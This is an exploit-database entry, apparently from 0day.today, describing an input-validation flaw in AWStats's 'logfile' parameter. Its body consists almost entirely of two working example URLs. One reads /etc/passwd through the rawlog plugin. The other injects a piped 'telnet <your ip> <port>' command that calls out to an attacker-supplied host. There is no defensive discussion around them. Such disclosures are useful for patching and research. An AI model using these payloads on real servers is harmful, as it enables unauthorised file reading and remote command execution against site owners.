id: 5953
date: 08/21/2004
title: AWStats Input Validation Hole in 'logfile'
author: n/a
cves: 

==========================================
AWStats Input Validation Hole in 'logfile'
==========================================


Example:

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&log file=/etc/passwd

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>



#  0day.today [2023-03-22]  #